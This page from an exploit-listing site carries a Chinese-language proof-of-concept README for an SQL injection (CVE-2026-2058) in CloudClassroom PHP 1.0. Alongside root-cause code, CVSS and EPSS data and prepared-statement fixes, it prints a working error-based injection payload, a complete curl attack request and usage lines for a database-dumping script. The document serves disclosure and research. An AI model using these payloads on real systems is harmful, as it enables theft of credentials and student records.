Sploitus

Exploit for CVE-2026-2058-PoC

kitploit · 2026-09-03

Exploit Code

MARKDOWN254 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-CARLOSALBERTOTUMA-CVE-2026-2058-POC
# CVE-2026-2058-PoC – CloudClassroom PHP 项目 SQL 注入

## 概述

_CloudClassroom PHP 项目 (v1.0)_ 的 **Post Query 功能** 中存在一个 **SQL 注入漏洞** 。

该漏洞允许攻击者通过 **`squeryx` POST 参数**注入任意 SQL 命令,从而导致**数据库枚举和数据窃取** 。

本仓库包含一个 **概念验证 (PoC) 漏洞利用程序** ,演示了如何利用该漏洞从后端数据库中窃取敏感数据。

* * *

## 漏洞信息

字段| 值  
---|---  
CVE| CVE-2026-2058  
漏洞类型| SQL 注入  
CWE| CWE-89  
受影响软件| CloudClassroom PHP 项目  
受影响版本| 1.0  
组件| Post Query 功能  
攻击向量| 远程  
是否需要认证| 否  
影响| 数据库泄露  
严重程度| 高  
攻击模式参考| CAPEC-66  
  
* * *

## 易受攻击的端点

root@kitploit:~
    
    
    POST /postquerypublic
    

### 易受攻击的参数

root@kitploit:~
    
    
    squeryx
    

* * *

## 根本原因

后端代码直接将用户输入拼接进 SQL 查询,而没有进行适当的清理或使用参数化查询。

易受攻击的代码示例:

root@kitploit:~
    
    
    $sql = "INSERT INTO query(Query, Eid) VALUES ('$tempsquery','$tempseid')";
    

由于 `$tempsquery` 来源于用户输入,攻击者可以注入任意 SQL。

* * *

## 易受攻击的实验环境 (Docker)

出于测试和研究目的,提供了一个易受攻击的 Docker 环境。

### 运行易受攻击的应用程序

root@kitploit:~
    
    
    docker run -d --name cloudclassroom-lab -p 9292:80 bladscan/cloudclassroom-sqli:1.0
    

* * *

## 概念验证

该漏洞可通过利用 MySQL `updatexml()` 函数的**基于报错的 SQL 注入** 技术来触发。

示例载荷:

root@kitploit:~
    
    
    a' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) AND '1'='1
    

* * *

## 手动利用

示例 `curl` 请求:

root@kitploit:~
    
    
    curl -X POST http://TARGET/postquerypublic \
    -H "Content-Type: application/x-www-form-urlencoded" \
    --data-urlencode "gnamex=test" \
    --data-urlencode "some-email@example.com" \
    --data-urlencode "squeryx=a' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) AND '1'='1" \
    --data-urlencode "update=Post Query!"
    

预期响应:

root@kitploit:~
    
    
    XPATH syntax error: '~cc_db~'
    

* * *

## 漏洞利用脚本

本仓库包含一个 bash 漏洞利用脚本,可自动:

  * 提取**数据库名称**
  * 枚举**数据表**
  * 枚举**数据列**
  * 转储**表数据**



### 使用方法

root@kitploit:~
    
    
    chmod +x cloudclassroom_sqli_exploit.sh
    
    ./cloudclassroom_sqli_exploit.sh http://TARGET/postquerypublic
    

示例:

root@kitploit:~
    
    
    ./cloudclassroom_sqli_exploit.sh http://192.168.1.10/postquerypublic
    

* * *

## 影响

攻击者可以:

  * 枚举数据库结构
  * 窃取敏感数据
  * 获取管理员凭据
  * 访问学生记录
  * 完全攻陷后端数据库



* * *

## CVSS 评分

### NIST NVD

  * 基础评分:**9.8 (严重)**
  * 向量:`CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`



### CNA (VulDB)

  * 基础评分:**7.3 (高危)**
  * 向量:`CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L`



⚠️ 注意:由于影响评估不同,NVD 的 CVSS 评分与 CNA (VulDB) 的评分存在差异。

* * *

## EPSS (漏洞利用预测评分系统)

漏洞利用预测评分系统 (EPSS) 用于估算漏洞在现实环境中被利用的概率。

CVE| EPSS 概率| 百分位| 日期  
---|---|---|---  
CVE-2026-2058| 0.00028| 7.62 %| 2026-03-01  
  
来源:FIRST EPSS 数据集

* * *

## 缓解措施

开发人员应:

  * 使用**预编译语句**
  * 实施**输入验证**
  * 正确转义用户输入
  * 应用**最小权限数据库权限**



安全实现示例:

root@kitploit:~
    
    
    $stmt = $conn->prepare("INSERT INTO query(Query, Eid) VALUES (?, ?)");
    $stmt->bind_param("ss", $tempsquery, $tempseid);
    $stmt->execute();
    

* * *

## 截图

### SQL 注入利用

![image](https://assets.kitploit.com/production/public/readmes/52017/632d3c85d198107fa9434c50995c2530ffc6ae1e4e1a44d31b0e2ac0ea8865c7/0a358fb829a912466d501eade7dad930efaf8e31cafa8d0f14169bfc59305926-display-v1.webp)

* * *

![image](https://assets.kitploit.com/production/public/readmes/52017/23e05a5f4f31a9562b22d8cb2181664c96783d5571a9b76a578a4a0149a0f502/7e49f7d84770b7269c8d160b0c80d0dfd32eb0b09429bcbbfbac2fb7e6655e38-display-v1.webp)

* * *

## 参考

  * https://cwe.mitre.org/data/definitions/89.html
  * https://owasp.org/Top10/2025/A05_2025-Injection/
  * https://capec.mitre.org/data/definitions/66.html
  * https://github.com/OWASP/www-project-web-security-testing-guide/blob/master/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection.md



* * *

## 免责声明

此漏洞利用程序仅供**教育和研究目的** 使用。

作者对因使用此代码而造成的**滥用或损害概不负责** 。

* * *

## 作者

**bl4dsc4n**

安全研究员